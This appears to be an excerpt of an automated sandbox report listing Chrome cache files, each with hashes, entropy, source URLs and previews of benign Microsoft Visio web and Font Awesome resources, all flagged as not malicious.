                                                        SHA1:4A678A3BD67EDA1D19C479031C840AACC86E1018
                                                        SHA-256:CB733303BDB2DF77F8A3586F21D1F9B5E258A765020DCA6A2B76906B2F5A254D
                                                        SHA-512:70661FC6B3C1A9EB4B146E08A2FD66212700563C8888B41755F7B94D74FCF7F5B21CB67BC964AD08CBF7CC85DA5DF268EF8EF1C074643547295B4600252FCB26
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hCB733303BDB2DF77_resources/1033/VisioWeb.css
                                                        Preview:img{border:none;}.ci{display:inline-block;}.swBar{display:none;position:fixed !important;z-index:999;background-color:#fff;padding:20px 10px 10px 20px;top:30px;left:auto;right:auto;border:1px solid #b6b6b6;margin:10px;box-sizing:content-box;box-shadow:0px 1px 15px rgba(0,0,0,0.4);opacity:0;transition-property:opacity,top;transition-duration:0.5s;transition-timing-function:cubic-bezier(0,0,0,1);transition-delay:0s;width:600px;-moz-user-select:-moz-none;-khtml-user-select:none;-webkit-user-select:none;-ms-user-select:none;user-select:none;}.swBar:focus{outline:none;}.swBar.closeAnimation{transition-duration:0.2s;transition-timing-function:cubic-bezier(0.33,0,0.67,1);}.swBar.HeaderRtl.O365Switcher{padding-left:10px;padding-right:20px;}@media (min-width:660px){.swBar,.swBar.O365Switcher{width:600px;}}@media (min-width:900px){.swBar.O365Switcher{width:840px;}}@media (max-width:899px) and (min-width:780px){.swBar.O365Switcher{width:720px;}}@media (max-width:659px){.swBar,.swBar.O365Switcher{

                                                        Chrome Cache Entry: 442

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):347
                                                        Entropy (8bit):5.408200703020753
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3C88BAA1E6188C1E4A4FB98DE76F64AF
                                                        SHA1:625DA68AF01A7FB72DFC55A332566D581196F5A1
                                                        SHA-256:EB1CC90A126B4403A32B26838D53129CEBF5D0A8F2F295ADDB751DBAE15B3689
                                                        SHA-512:F827D7970CE038F7B6844B5E12BF10CD99C26F105247CCDBE281C3D1609DBD39CB9827AA3EE98C4BAE03DE34F06556C4D33901C2E0BA75F5E7032804C1D5145F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"OneShell":{"UpdatedConsumerAppList":true,"M365StartEnabled":true,"DisableM365StartIntentsModule":false,"default":true},"Headers":{"ETag":"\"8M6C3IBLtb8mwT1KNreplkZ/i0rFbbeiyWPkxzwWrg0=\"","Expires":"Thu, 31 Oct 2024 11:12:08 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"OneShell":"P-R-1157040-4-8,P-R-1131228-4-17,P-D-1117449-1-4"}}

                                                        Chrome Cache Entry: 445

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):36345
                                                        Entropy (8bit):4.811743495517893
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C50733E5A9BA699E431FFBFA227D00C1
                                                        SHA1:90806716051702A6DE3763E407FB6CCEC622ECC9
                                                        SHA-256:B3D518D5ACA80A9CC07170E4F88B1AC23EE29F307715A190B8961BAF96DF3406
                                                        SHA-512:18D7AB69B3700973AD3FAF667CC0606E3BF904111EDC4F1C11C7AF3A7BADA8D28BA721DDB5985A70470B265E2BC5679B252025CC5E2BA4490873DA4810A810DD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"dashboard":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/dashboard.en.bundle.js"},"version":"2024.10.24.1"},"groups":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/groups.en.bundle.js"},"version":"2024.10.24.1"},"app-mgmt":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/app-mgmt.en.bundle.js"},"version":"2024.10.24.1"},"esign":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.24.1/esign.en.bundle.js"},"version":"2024.10.24.1"},"viva-goals-organization-views"

                                                        Chrome Cache Entry: 446

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):360340
                                                        Entropy (8bit):5.477598176554232
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8446598394ECB3B2A33B2E8AF192D656
                                                        SHA1:E7FD9847A2D96301B8A7BBCFA17F82D3CAC87398
                                                        SHA-256:7EF71C018860894F6B366054C8BADD515AD0CD4DB839C6BF04A9F4F570850857
                                                        SHA-512:4DF60C6A1796182DE0048230A67331EC2A6DFE2D5D1C72BD88245069EEFCB1CE6FCFAF5374830EF3A023CF766F3F7C78002050401F3CBB9D10477C109B5705B4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://wise.public.cdn.office.net/wise/owl/owl.visio.slim.ab2280729596e38e544f.js
                                                        Preview:var Microsoft;!function(){"use strict";var t,e,i,n,o={9188:function(t,e,i){i.d(e,{t:function(){return r}});var n=i(3260),o=i(1864),s=i(2581),r=function(t){function e(e){var i=t.call(this)||this;return i.A=e,i}return n.C6(e,t),Object.defineProperty(e.prototype,"value",{get:function(){return this.getValue()},enumerable:!0,configurable:!0}),e.prototype.H=function(e){var i=t.prototype.H.call(this,e);return i&&!i.closed&&e.next(this.A),i},e.prototype.getValue=function(){if(this.hasError)throw this.thrownError;if(this.closed)throw new s.P;return this.A},e.prototype.next=function(e){t.prototype.next.call(this,this.A=e)},e}(o.B7)},3379:function(t,e,i){i.d(e,{c:function(){return h}});var n=i(2318),o=i(9607),s=i(4646),r=i(6830);function a(t){return t}var c=i(4666),h=function(){function t(t){this.F=!1,t&&(this.H=t)}return t.prototype.lift=function(e){var i=new t;return i.source=this,i.operator=e,i},t.prototype.subscribe=function(t,e,i){var r=this.operator,a=function(t,e,i){if(t){if(t instanceof n

                                                        Chrome Cache Entry: 452

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                        Chrome Cache Entry: 453

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65508), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):145947
                                                        Entropy (8bit):5.001627726395814
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8A4DA7A19E3598FDA45D8964896A2029
                                                        SHA1:90AA3CFEE3D8622BA039C20A611BD38EE1032294
                                                        SHA-256:229F539D80AC56A626F71775383C87D3A8591616FC803B4A4BBA07E6140DA3E2
                                                        SHA-512:A3515894B66771122EFA2FF56E49C6CC356827B5D23BB5EC367087F09CFCDB313520C026538ED3B03E7001B97ED2945AA4570835DB5133DCF86E3BD1D5554EEA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:Type.registerNamespace("VisioWebIntl");VisioWebIntl.VisioWebStrings=function(){};VisioWebIntl.VisioWebStrings.registerClass("VisioWebIntl.VisioWebStrings");VisioWebIntl.VisioWebStrings.L_About="About";VisioWebIntl.VisioWebStrings.L_CloseMenu="Close Menu";VisioWebIntl.VisioWebStrings.L_DownloadCopyButtonTitle="Download a Copy";VisioWebIntl.VisioWebStrings.L_DownloadCopyButtonDescription="Download a copy to your computer.";VisioWebIntl.VisioWebStrings.L_DownloadAsPDFButtonDescription="Download a copy of this drawing as a PDF file.";VisioWebIntl.VisioWebStrings.L_DownloadAsPDF="Download as PDF";VisioWebIntl.VisioWebStrings.L_DownloadAsImage="Download as Image";VisioWebIntl.VisioWebStrings.L_FormatShape="Format Options";VisioWebIntl.VisioWebStrings.L_DownloadAsImageButtonDescription="Download a copy of this drawing as an Image file.";VisioWebIntl.VisioWebStrings.L_Print="Print";VisioWebIntl.VisioWebStrings.L_PrintButtonDescription="Print this drawing.";VisioWebIntl.VisioWebStrings.L_EditBu

                                                        Chrome Cache Entry: 454

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (43543), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):43543
                                                        Entropy (8bit):5.423385866385864
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CD29FF162429331DACAE2919F714ADDF
                                                        SHA1:5B78CA74E740E3212A365EE35AB3EB756C8B3248
                                                        SHA-256:88214871568A3D32D4231BB153D3F9FC9B525E425E58DDFA911805660B62E0EC
                                                        SHA-512:3BAFE71DC468A57CF5C64B15889D50A56D274F7CED118995189C27782ED921B78D777F12CDC0A792793D08E5E81BEBA29D30CF7E36BBBFFDE17F4D340EAFF2B2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h88214871568A3D32_App_Scripts/visioboot.js
                                                        Preview:function sendPostMessageToHostFrame(n,t){try{if(g_postMessageOrigin==null||window.parent==null)return;t||(t={});var i={MessageId:n,SendTime:Date.now(),Values:t};window.parent.postMessage(JSON.stringify(i),g_postMessageOrigin)}catch(r){}}function registerAndHandleModeSwitchPostMessageFromHostFrame(){window.addEventListener("message",function(n){var i,t,r;try{if(n==null||g_postMessageOrigin==null||n.origin!=g_postMessageOrigin)return;if(i=JSON.parse(n.data),i.MessageId=="Visio_SwitchMode_FromHostFrame"){if(!g_bgEditAppSettings||!backgroundEditAppPageInit){r={IsSuccess:!1,ErrorMsg:"Background edit app settings or edit app is not available"};sendPostMessageToHostFrame(g_modeSwitchPostMessageAckToHost,r);return}t=i.Values;t&&t.toString().length>0&&(g_bgEditAppSettings.VisioModeSwitchClickTime=t.wdModeSwitchTime,g_bgEditAppSettings.VisioPreviousModeIlt=t.prevModeILT,g_bgEditAppSettings.VisioPreviousModeFFS=t.prevModeFFS,t.dct&&(g_bgEditAppSettings.VODCT=t.dct));g_isBackgroundEditAppInitializ

                                                        Chrome Cache Entry: 458

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):16
                                                        Entropy (8bit):3.875
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7451D9780DDDCF498DCE66B9E4EF897A
                                                        SHA1:48959E62C02A67CF9DAF81251698B1C6FF87FA38
                                                        SHA-256:23BFAA0268E32C99B1C4EA2BDA34969E55F258781A978A4FEB133B9C98E372D0
                                                        SHA-512:47F774AE820084C0893CCA8D7EFC5B06A63F38395FE72E24C523212E05063BF88CF56D44AC746E79120096C37EE30E487DB0DB4DA9FACF44337A73F78C1E0D5B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlJS7E3oVswARIFDQ9hEiI=?alt=proto
                                                        Preview:CgkKBw0PYRIiGgA=

                                                        Chrome Cache Entry: 460

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):575046
                                                        Entropy (8bit):5.525934727800572
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E6B6011815B95CA743CF90CD054539E5
                                                        SHA1:3114EA766DDB2531BD8A0FB226169687A1B95031
                                                        SHA-256:B2DFD167040E1DF1362F2B74E8BAB095D68E0BE6C04AFD480863CE02773E2E00
                                                        SHA-512:971B70C5DD09C9FD5F904C42E57A13F440889C70745369EA8EF5D4D6CB5C61BE07C54CDB8BB475E770E0DF8A783F8534C99ED214A8715295FCBCC9CB3603A430
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[868],{69025:function(){var e=window.performance,t=!!e&&"function"==typeof e.mark;t&&e.mark("shell_bootstrapper_start"),function(){var e,t,n,o,r={7115:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AMxnMktIQnQDohnXUqQ5WInemGSyTUJSUM56WA1Eqk74CUhcUDz+Ju

                                                        Chrome Cache Entry: 466

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 156532, version 773.256
                                                        Category:downloaded
                                                        Size (bytes):156532
                                                        Entropy (8bit):7.996386572265519
                                                        Encrypted:true
                                                        SSDEEP:
                                                        MD5:D465BCCB9EDF0873F021F66D4B09D89C
                                                        SHA1:214F3C71DE28C682602AECD39E9AD2BBA15F1B0C
                                                        SHA-256:F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
                                                        SHA-512:35D7523F48386E89B1CAD6A47DF65D64415AB9C45E6425BB4AB25AC9510F6D2E9DE3D7CAD79C2491660E885D7A38D3FFA9E93EB50AE045FBD072DEAF114E10B8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2
                                                        Preview:wOF2......ct.......A..c(.........................6.$. .`..<......\.@..m. % ....PX.....6.F.h.....^.......f%.....*..~.....W.........7...../.....?.....q...i........h..s'@.I...D...V.F.)(V..`.7.B....u....J...I.U..9E..`M...Zf......R.&.t&&.j....-..$...";.:...9... .3;...8...j%.'.@....>=.Hbdj..W.@.<].'7..`..tja~.X.<<....O..@./)x."A..6.....A..V+...^.t[p.a.A............N.>ilUN.@ek..^ .U.%....E ...pz&..M..^5TWwAc.d.....C......6Y...y...e../f.P..:...v..._B..zBOO.......f7cv....;.\..`:.1. .bHZ.."E.T$E.5iE...y.e..)."..m...Cz{..Yr....?ij....W.UH.....P@w...h.:.."..I+..DR.-(Q....4r...(.R;HCg8.aw{.I..c8..,{..L.5......R..g.{.g.'..<...........X....G.H$E..(0H.).A..e.B..).2O.l..2..Z....I.g...L9Hr..y~...\......4...x.....x.&.!?....M&ix..E....7.'):K..l.R.......K.%R .x.m...f..Wr...)...{.....n9W.........=H....5J.=b...$BT.Q....$`.....3..UT..<....K..KM$._O.S....a........p....%S8.S.Na.....2.F.U.\.....|.._.h.;.}L.....Y.Z..!..S.N.*EG]..<_k.Y.}.!t/.<U.....:......P`B..4.B......

                                                        Chrome Cache Entry: 469

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (1592)
                                                        Category:dropped
                                                        Size (bytes):6866
                                                        Entropy (8bit):5.019429759594639
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9683E6A3C9D2B74BCCC1EC59D9DDEDDB
                                                        SHA1:097D796D0DC84DD19B9B292800CC813CC41316FD
                                                        SHA-256:0E058DE9B2F0AC39DEE81EA83A167392757A050C2C216E85F86061610E0B16D8
                                                        SHA-512:E889CDAAF533300EB2DC9CC424D44CBD9330C25EB422733D5829D0CBB610FBDF91C2D15B8AB966EDC3CB1F5D2CD88FA2EE6B1294A9F6FC09FCE35DCAD3AF696B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{708:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,809:e=>{e.exports=JSON.parse('{"a":"A source with id \

                                                        Chrome Cache Entry: 476

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):592639
                                                        Entropy (8bit):5.290428977403525
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2167B92C98B9BBFFD010F631334D8114
                                                        SHA1:127613407C74AF338E8BC7174B82B5C47806EC09
                                                        SHA-256:588C70CBB67C0E91CB180F22412F868D48A8B0F95B3A991E5E2834D662D5F39E
                                                        SHA-512:E1049C00A833152BF07E29CA61B2D1CA00FFFD1AB10F8436275AFC7837844E29689C2F2C82D907BE59C25339894FFE5FF8EFC2D6DD23CE5C25B1BE9402606A25
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h588C70CBB67C0E91_App_Scripts/es2020/sharedCommentsLazy.min.js
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[196],{35710:function(e,t,n){"use strict";n.d(t,{B:function(){return a}});var r=n(23345),o="9FA40DC1-775B-46F7-B124-3E10E131B835";function i(e){return null==e?o:e}function a(e,t,n){void 0===t&&(t=100);var o=new Map,a=0;return function(){for(var s,l,c=[],u=0;u<arguments.length;u++)c[u]=arguments[u];if(0===c.length)return e.apply(void 0,(0,r.__spreadArray)([],(0,r.__read)(c),!1));a>t&&(o.clear(),a=0,null==n||n());var p=i(c[0]),d=null!==(s=o.get(p))&&void 0!==s?s:{nextArgMap:new Map};o.has(p)||o.set(p,d);for(var f=1;f<c.length;f++){var h=i(c[f]),m=null!==(l=d.nextArgMap.get(h))&&void 0!==l?l:{nextArgMap:new Map};d.nextArgMap.has(m)||d.nextArgMap.set(h,m),d=m}return void 0!==d.value||(a++,d.value={storedResult:e.apply(void 0,(0,r.__spreadArray)([],(0,r.__read)(c),!1))}),d.value.storedResult}}},77507:function(e){var t;self,t=()=>(()=>{var e={6996:(e,t,n)=>{"use strict";var r=n(9976),o=n(9536),i=o(r("String.prototype.index

                                                        Chrome Cache Entry: 478

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):1962
                                                        Entropy (8bit):5.285199860596591
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:62524992DA92633A93B8755B3789FC84
                                                        SHA1:51BB09C4E89D29DD3E9E59D214787EC0CF5949DD
                                                        SHA-256:74BD5C8552ACE4682884CEECD9C8DF3ADC0B58671CDAFAD8160C7F101129CDCE
                                                        SHA-512:5E6E19617B5B3A8F6AA9E5AAF6EDD3B2ED98A3E510965A67DCBB5F3EA2C11F8562D01DF80702716E53CE2C693BCDD4CCA367C6FBF6FF60F6CADE565B5574474C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://ecs.office.com/config/v1/CHILL/0.0.12?disableexperiments=true&disablerollouts=false&Agent=ChillWAC&Platform=Web&Host=SharePoint%20Online&Audience=Production&TenantId=55a947d7-f4db-4329-90c0-bf5aa381250e&Application=Visio&version=16.0.18214.40601&language=en-US
                                                        Preview:{"Floodgate_Campaign_Visio.89356ac6-6c7a-4621-945c-5fdb71336b43":{"CampaignId":"89356ac6-6c7a-4621-945c-5fdb71336b43","GovernedChannelType":0,"NominationScheme":{"Type":0,"PercentageNumerator":40,"PercentageDenominator":100,"FallbackSurveyDurationSeconds":0,"NominationPeriod":{"Type":0,"IntervalSeconds":2592000},"CooldownPeriod":{"Type":0,"IntervalSeconds":7776000}},"SurveyTemplate":{"Type":4,"ActivationEvent":{"Type":1,"Sequence":[{"Type":0,"Activity":"VisioAppUsageNPSV2","Count":300,"IsAggregate":true},{"Type":0,"Activity":"VisioAppUsageNPSFollowUpActivityV2","Count":1,"IsAggregate":false}]},"UxSchema":{"variables":{},"pages":[{"id":"32d91b8c-af39-4021-9b66-ad45521ea51c","displayName":"Amplify - Horizontal Rating","questions":[{"id":"rating1","type":"Rating","questionLabel":"How likely are you to recommend Visio for the web to others, if asked?","required":true,"visible":true,"ratingValues":["1","2","3","4","5"],"leftLegendValue":"Very Unlikely","rightLegendValue":"Very Likely"}],"ti

                                                        Chrome Cache Entry: 479

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
                                                        Category:downloaded
                                                        Size (bytes):116672
                                                        Entropy (8bit):7.9897401211491745
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:0474CCD4D3EC29857F1E7F8B9C56DF8B
                                                        SHA1:3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
                                                        SHA-256:B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
                                                        SHA-512:2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
                                                        Preview:wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u*.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY......*..B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@*...*......aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.

                                                        Chrome Cache Entry: 481

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (58562)
                                                        Category:dropped
                                                        Size (bytes):264504
                                                        Entropy (8bit):5.328925068984756
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:62E2827DCEEFA5258AB9F19DF3600918
                                                        SHA1:54A101F91D1AA825856A6273BE4D520AC7CEB554
                                                        SHA-256:42D08B7305C16C510E9E36FCBD8114B3BABD4E8364F1EC7F50C3E8EDAB70E710
                                                        SHA-512:B9EF7909A2BB2EE0CF411C644A9A0439BD0BCF619B4E475121856F9359ED3FBB9D6BCBCE0D2476B731F557CBA179E290022A1489C9150F684971BA33D95BD854
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*! For license information please see 16.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{712:(e,t,n)=>{"use strict";var a;n.d(t,{a:()=>a,b:()=>i}),function(e){e[e.CRITICAL=1]="CRITICAL",e[e.WARNING=2]="WARNING"}(a||(a={}));var i={BrowserDoesNotSupportLocalStorage:0,BrowserCannotReadLocalStorage:1,BrowserCannotReadSessionStorage:2,BrowserCannotWriteLocalStorage:3,BrowserCannotWriteSessionStorage:4,BrowserFailedRemovalFromLocalStorage:5,BrowserFailedRemovalFromSessionStorage:6,CannotSendEmptyTelemetry:7,ClientPerformanceMathError:8,ErrorParsingAISessionCookie:9,ErrorPVCalc:10,ExceptionWhileLoggingError:11,FailedAddingTelemetryToBuffer:12,FailedMonitorAjaxAbort:13,FailedMonitorAjaxDur:14,FailedMonitorAjaxOpen:15,FailedMonitorAjaxRSC:16,FailedMonitorAjaxSend:17,FailedMonitorAjaxGetCorrelationHeader:18,FailedToAddHandlerForOnBeforeUnload:19,FailedToSendQueuedTelemetry:20,FailedToReportDataLoss:21,FlushFailed:22,MessageLimitPerPVExceeded:23,MissingReq

                                                        Chrome Cache Entry: 482

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):3833
                                                        Entropy (8bit):4.379657173681706
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:78AA552CE17464EDE02E78941809FD1A
                                                        SHA1:C4B78206FE014DDBD436A4A4680722DCD3A7E836
                                                        SHA-256:73CCEFB9D6E610E7AB1AFEA89E99A64E41F9343930A0319536221D3D2C9C5FEA
                                                        SHA-512:69EEF4BCBD8210E6EAE5BB4E0B832524C73DA9A6DBF131AFC3B5953EAC7C88178B9A423668610A90F9DA83C3EA6B3A42B4E529301ECF0138C6E9C4B9D8D674AB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://euc-visio.officeapps.live.com/v/AppSettingsHandler.ashx?app=Visio&usid=43eeb8c2-a032-17d8-8427-46735f331328&build=20241027.7
                                                        Preview:{"timestamp":1730369533259,"BootstrapperUlsHeartBeatIsEnabled":false,"EnableCommonHostDiagnosticsParams":true,"ShouldLogJsApiKpisForWord":true,"EnableFramePageErrorReportingForWord":false,"EnableWordSessionRefreshTelemetry":false,"EnableWordSessionRefreshLoggingCleanup":false,"BootstrapperSettingsFetchPeriod":60000,"BootstrapperUlsHeartbeatIntervalMs":5000,"BootstrapperMaxUlsHeartbeatTime":600000,"BootstrapperNoCompleteWarning1Time":120000,"BootstrapperNoCompleteWarning2Time":180000,"BootstrapperUlsUploadCadenceMs":60000,"WordRefreshTelemetryExpirationInDays":7,"RequestedCallThrottlingDefaultToViewMinimumValue":"Major","RemoteUlsETag":"296849E457D14E58EBDDE9A17114D4475DBB5A97","RemoteUlsSuppressions":"378069,1671813,2208151,2209344,3249545,3290144,4273285,4285850,4298965,4298968,4298969,4751696,5018275,5306497,5904476,6375195,6572226,6948167,7463498,8194017,8458642,17044289,17085210,17085216,17162522,17358857,17387682,19214611,19243470,19707039,19743902,19939648,20486158,21627712,21631

                                                        Chrome Cache Entry: 486

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):73609
                                                        Entropy (8bit):5.516785181346927
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1E949E77B6F3AE3CDFCE9B68E8ED474A
                                                        SHA1:F2F60124A0577952B18636F3A0C2A884364C4FD7
                                                        SHA-256:D3E295E1747B5BB57B19AD2E13E4F64A72EF6F3B662D02DF5326CD0A62591993
                                                        SHA-512:255578A172FE20DEFB4B9C4D82DC9C657176DFB474082FCCB81A8F61D93377A04399B2B1A15268B19865BF131C94DC1792FF3F33A1A0FEB41F1FA212B1DFD2C3
                                                        Malicious:false
                                                        Reputation:unknown
